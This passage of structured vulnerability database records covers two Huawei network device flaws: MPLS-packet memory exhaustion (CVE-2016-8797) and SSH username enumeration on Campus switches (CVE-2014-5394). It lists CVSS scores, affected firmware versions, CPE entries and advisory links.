         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 5,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-8797",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2016-11302",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-97617",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-8797",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2016-8797",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2016-11302",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201704-187",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-97617",
                  trust: 0.1,
                  value: "MEDIUM",
               },
               {
                  author: "VULMON",
                  id: "CVE-2016-8797",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            db: "VULMON",
            id: "CVE-2016-8797",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion. The Huawei AR3200 is a Huawei router. The S9700, S5300, S5700, S6300, S6700, S7700, S9300, and S9700 are Huawei switch devices. A number of Huawei products have a memory leak vulnerability. The Multi-Protocol Labeling (MPLS) packet processing module of the device repeatedly requests the memory when processing abnormal packets. There is a risk that the continuous attack will cause the memory to run out. An attacker could exploit this vulnerability to cause the device to run out of memory. The Huawei AR3200 and others are all products of China's Huawei (Huawei). The following products are affected: Huawei AR3200 V200R007C00 Version, V200R005C32 Version, V200R005C20 Version; S12700 V200R008C00 Version, V200R007C00 Version; S5300 V200R008C00 Version, V200R007C00 Version, V200R006C00 Version; S5700 V200R008C00 Version, V200R007C00 Version, V200R006C00 Version; S6300 V200R008C00 Version, V200R007C00 Version;  S6700 V200R008C00 version, V200R007C00 version; S7700 V200R008C00 version, V200R007C00 version, V200R006C00 version; S9300 V200R008C00 version, V2007C00 version, V200R006C00 version;",
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            db: "VULMON",
            id: "CVE-2016-8797",
         },
      ],
      trust: 2.34,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2016-8797",
            trust: 3.2,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
            trust: 0.1,
         },
         {
            db: "VULMON",
            id: "CVE-2016-8797",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            db: "VULMON",
            id: "CVE-2016-8797",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   id: "VAR-201704-0422",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
      ],
      trust: 1.496474832857143,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
      ],
   },
   last_update_date: "2024-02-13T22:59:50.414000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20160608-01-mpls",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
         },
         {
            title: "Patches for memory leaks in various Huawei products",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/84093",
         },
         {
            title: "Various Huawei product memory leak vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69035",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-399",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8797",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2016-8797",
         },
         {
            trust: 0.6,
            url: "http://www.huawei.com/cn/psirt/security-advisories/2016/huawei-sa-20160608-01-mpls-cn",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/399.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            db: "VULMON",
            id: "CVE-2016-8797",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            db: "VULMON",
            id: "CVE-2016-8797",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-11-18T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            date: "2017-04-02T00:00:00",
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            date: "2017-04-02T00:00:00",
            db: "VULMON",
            id: "CVE-2016-8797",
         },
         {
            date: "2017-05-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            date: "2017-04-07T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            date: "2017-04-02T20:59:01.860000",
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-11-18T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            date: "2017-04-11T00:00:00",
            db: "VULHUB",
            id: "VHN-97617",
         },
         {
            date: "2017-04-11T00:00:00",
            db: "VULMON",
            id: "CVE-2016-8797",
         },
         {
            date: "2017-05-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            date: "2017-04-07T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            date: "2017-04-11T01:03:45.743000",
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Vulnerability that can consume memory in product software",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "resource management error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
      ],
      trust: 0.6,
   },
}

var-201801-0087
Vulnerability from variot

Multiple Huawei Campus switches allow remote attackers to enumerate usernames via vectors involving use of SSH by the maintenance terminal. plural Huawei Campus A switch product contains an information disclosure vulnerability.Information may be obtained. Huawei Campus Series Switches is China's Huawei series of Campus switches. Huawei Campus Series Switches has a user enumeration vulnerability that allows an attacker to exploit a vulnerability to obtain a valid username and initiate further attacks. An attacker may leverage this issue to harvest valid usernames, which may aid in further attacks. A remote attacker can use this vulnerability to log in to the server through SSH to guess whether a user name exists on the switch device based on the information returned by the server

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0087",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s3700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s3300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v100r006c05",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s2300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus series switches",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2014-05162",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008459",
         },
         {
            db: "NVD",
            id: "CVE-2014-5394",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201408-326",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300e_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v100r006c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
